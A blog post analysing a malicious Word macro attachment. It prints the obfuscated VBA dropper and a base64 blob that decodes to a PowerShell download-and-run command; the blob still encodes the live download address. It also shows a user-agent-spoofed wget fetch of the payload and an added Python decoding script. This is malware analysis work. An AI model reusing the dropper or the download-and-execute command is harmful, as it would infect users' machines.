Malware Must Die!

Everyone gets unwanted e-mails in their inbox; some are caught by spam filters or virus scanners, others get through. My spam filters are really good, but that does not apply to malware mails, and recently I got one. Usually I delete those and life goes on, but this time I was curious what this piece in my inbox would do.

Malware File

Attached to the email is a ZIP file which pretends to be an invoice and contains a rechnung_20_Juli.docm.
Ha - a malicious VBA macro file. Usually those are just droppers for downloading the real malware.
It’s too dangerous to run this on my machine, even though it runs Linux.
For this I’m using a Fedora 24 Workstation LiveCD image to work on, and deleting the virtual machine afterwards.


To extract and decompile VBA code out of a Word document I will use oledump. This helper tool was written by Didier Stevens.

[liveuser@localhost]$ oledump.py rechnung_20_Juli.docm

 A: word/vbaProject.bin
 A1:       112 '\x01CompObj'
 A2:        20 '\x01Ole'
 A3:        36 '\x02OlePres000'
 A4:       640 'PROJECT'
 A5:       122 'PROJECTwm'
 A6: M    1251 'VBA/ThisDocument'
 A7: M    7961 'VBA/TpJXPSnp'
 A8:      4921 'VBA/_VBA_PROJECT'
 A9:       907 'VBA/dir'
A10: m    1159 'VBA/elDSLrLD'
A11: M    7125 'VBA/iMbytqXR'
A12:        97 'elDSLrLD/\x01CompObj'
A13:       290 'elDSLrLD/\x03VBFrame'
A14:       367 'elDSLrLD/f'
A15:       728 'elDSLrLD/o'

The dump shows macro code at positions A6, A7, A10 and A11, which I will extract to read the source code:

[liveuser@localhost]$ oledump.py rechnung_20_Juli.docm -s A6 -v > ThisDocument
[liveuser@localhost]$ oledump.py rechnung_20_Juli.docm -s A7 -v > TpJXPSnp
[liveuser@localhost]$ oledump.py rechnung_20_Juli.docm -s A10 -v > elDSLrLD
[liveuser@localhost]$ oledump.py rechnung_20_Juli.docm -s A11 -v > iMbytqXR

Code Analysis

I will start by analyzing ThisDocument, where the initial call would be, and dig forward in the code.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_close()
End Sub
Private Sub BsOuIZuQ()
End Sub

It seems the function and variable names are obfuscated to hamper analysis of the code, which should not stop us…
The document_close trigger calls another module in the document, iMbytqXR.bLluwqOR. Let’s look further.

Attribute VB_Name = "iMbytqXR"
Sub bLluwqOR()
Dim rGCzJptK, OPTxrRXP, gYdJjNFA As String
Dim JHUkheaC, xQgSEvKG, aYXiHLPY As String
JHUkheaC = "           EAZAFM               "
xQgSEvKG = LTrim(JHUkheaC)
aYXiHLPY = RTrim(xQgSEvKG)

rGCzJptK = "           JQGAJH               "
Dim xYhxOvoH, PwwNFplv, dUOMcUeK As String
xYhxOvoH = "           ABIBZX               "
PwwNFplv = LTrim(xYhxOvoH)
dUOMcUeK = RTrim(PwwNFplv)

OPTxrRXP = LTrim(rGCzJptK)
Dim AkHiOlTA, belMUmqN, SoyCpogq As String
AkHiOlTA = "           SMODYQ               "
belMUmqN = LTrim(AkHiOlTA)
SoyCpogq = RTrim(belMUmqN)

gYdJjNFA = RTrim(OPTxrRXP)

There is a lot of code which does nothing, certainly an attempt to confuse us.
Still, a few lines in this function are interesting:

cSkUpwJi = elDSLrLD.AJkMVXXy + elDSLrLD.KCowABrm + elDSLrLD.gHUxCExw + elDSLrLD.rKGIXazg
gNGRdALo = elDSLrLD.NhazmwgJ + elDSLrLD.gaRqBeoE + elDSLrLD.vaeKdnlJ
Set mwpwegHX = CreateObject(gNGRdALo)
mwpwegHX.Run (R1OSe0au(cSkUpwJi)), 0

A glance at the first summary I created shows that elDSLrLD is a frame and not VBA code, so it cannot be read out of the box. LibreOffice is also installed on my Fedora 24 Workstation live image, and it can open VBA macro files. I’m sure this piece of malware is prepared for Windows, and for security reasons macros are disabled by default in LibreOffice, so it should be safe to open this. I opened the Word document and exported the frame via “Tools - Macros Editor” into a readable XML format.

The result shows that the code reads properties from a userform interface object, such as a text field.

<dlg:textfield dlg:style-id="0" dlg:id="AJkMVXXy" dlg:tab-index="0" dlg:left="6" dlg:top="13" dlg:width="0" dlg:height="10" dlg:tabstop="true" dlg:value="JWNPbVNQZUMlIC9yIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgQnlQYXNzIC1O"/>

Reconstructed from the field values, the string cSkUpwJi shows


and seems to be a base64 encoded string:

[liveuser@localhost]$ echo "JWNPbVNQZUMlIC9yIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgQnlQYXNzIC1Ob1Byb2ZpbGUgLWNvbW1hbmQgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovL2pucmUucGxleGFjcnlsLmV1LzYwcy90aGVkb29ycy9icmVha29udGhyb3VnaC5waHAnLCclVE1QJVxHSkhqc2FUdWFzZC5leEUnKTtTdGFydCAnJVRNUCVcR0pIanNhVHVhc2QuZXhFJzsNCg==" | base64 -d

%cOmSPeC% /r powershell.exe -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('','%TMP%\GJHjsaTuasd.exE');Start '%TMP%\GJHjsaTuasd.exE';
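
The reconstruction and decoding steps above, scripted as an added example (not code from the original post): it reads the text-field values from an exported dialog XML, joins them in the order the macro expression names them, base64-decodes the result and defangs the URL for note-taking. The XML, the payload and the example.invalid host are constructed for illustration; only the form name, the field ids and the macro line come from the page.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed stand-in payload: same shape as the decoded command, inert host.
PAYLOAD = ("%cOmSPeC% /r powershell.exe -NoProfile -command (New-Object "
           "System.Net.WebClient).DownloadFile('http://stage.example.invalid/"
           "a.php','%TMP%\\sample.exE');")
B64 = base64.b64encode(PAYLOAD.encode()).decode()
IDS = ["AJkMVXXy", "KCowABrm", "gHUxCExw", "rKGIXazg"]  # field ids used by the macro
CUT = [0, 40, 80, 120, len(B64)]                        # constructed split points
# Fields are written in shuffled order on purpose: file order is not macro order.
SAMPLE_XDL = ('<dlg:window xmlns:dlg="http://openoffice.org/2000/dialog">'
              + "".join('<dlg:textfield dlg:id="%s" dlg:value="%s"/>'
                        % (IDS[i], B64[CUT[i]:CUT[i + 1]]) for i in (2, 0, 3, 1))
              + "</dlg:window>")
MACRO_LINE = ("cSkUpwJi = elDSLrLD.AJkMVXXy + elDSLrLD.KCowABrm + "
              "elDSLrLD.gHUxCExw + elDSLrLD.rKGIXazg")  # taken from the macro


def field_values(xdl_text):
    """Map each textfield id to its value, ignoring namespace prefixes."""
    local = lambda name: name.rsplit("}", 1)[-1]
    out = {}
    for el in ET.fromstring(xdl_text).iter():
        if local(el.tag) == "textfield":
            attrs = {local(k): v for k, v in el.attrib.items()}
            out[attrs["id"]] = attrs.get("value", "")
    return out


def reconstruct(macro_line, form, fields):
    """Join the fields in the order the macro expression names them, then decode."""
    order = re.findall(r"\b%s\.(\w+)" % re.escape(form), macro_line)
    missing = [name for name in order if name not in fields]
    if missing:
        raise KeyError("fields absent from the dialog export: %s" % missing)
    joined = "".join(fields[name] for name in order)
    return base64.b64decode(joined, validate=True).decode("latin-1")


def defang(text):
    """Make URLs non-clickable before the command goes into notes or tickets."""
    return re.sub(r"(?i)\bhttp(s?)://([^\s'\"/]+)",
                  lambda m: "hxxp%s://%s" % (m.group(1), m.group(2).replace(".", "[.]")),
                  text)


if __name__ == "__main__":
    print(defang(reconstruct(MACRO_LINE, "elDSLrLD", field_values(SAMPLE_XDL))))
```
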

Download the Malware

Yaay - a malware download address. No way I would not download that to analyze it further!

A traceroute of the IP address shows a server in Ukraine.

But why is it giving me a Bad Gateway? Have the bad boys already shut down the link?
The other VBA code lines show the construction of a statement to download the malware bytes and run them afterwards.

[liveuser@localhost]$ curl -v
*   Trying
* Connected to ( port 80 (#0)
> GET /60s/thedoors/breakonthrough.php HTTP/1.1
> Host:
> User-Agent: curl/7.47.1
> Accept: */*
< HTTP/1.1 502 Bad Gateway
< Server: nginx/1.0.15
< Date: Wed, 27 Jul 2016 11:59:08 GMT
< Content-Type: text/html
< Content-Length: 173
< Connection: keep-alive
<head><title>502 Bad Gateway</title></head>
<body bgcolor="white">
<center><h1>502 Bad Gateway</h1></center>
* Connection #0 to host left intact

Probably they are checking whether a real PowerShell download request is coming in, so I will set my User-Agent to what PowerShell has: -

[liveuser@localhost]$ wget -O GJHjsaTuasd.exE --user-agent="-"
GJHjsaTuasd.exE               100%[===================>] 172.38K   387KB/s    in 0.4s

2016-07-27 07:03:48 (387 KB/s) - ‘GJHjsaTuasd.exE’ saved [176520/176520]

The downloaded malware is 173K in size and is a PE32 executable (console) Intel 80386, for MS Windows.
Time to get radare started. Radare is a portable reversing framework that can disassemble (and assemble for) many different architectures.